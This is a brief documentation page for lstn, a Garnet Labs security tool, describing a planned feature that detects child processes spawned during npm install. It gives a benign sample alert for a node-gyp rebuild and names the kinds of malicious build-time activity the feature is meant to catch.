Malicious child processes

Coming soon

Lstn detects child processes by monitoring process activity on the system where it's installed and running. When a new process is created and spawned by a parent process, lstn collects information about both the parent process and the newly spawned process. This information includes the command line used to start the process and the name of the parent process. The collected information is then used to generate a message indicating that a new process has been spawned by the parent process, in this case "npm install spawned a process".

For example:

  [medium] npm install spawned a process (from transitive dependency contextify@0.1.15)
    commandline: sh -c node-gyp rebuild
    executable_path: /bin/sh
    parent_name: node

During build time, malicious child processes can be spawned to carry out activities such as:

  • crypto mining

  • reverse shells

  • insertion of malicious payloads

Last updated

© 2024 Garnet Labs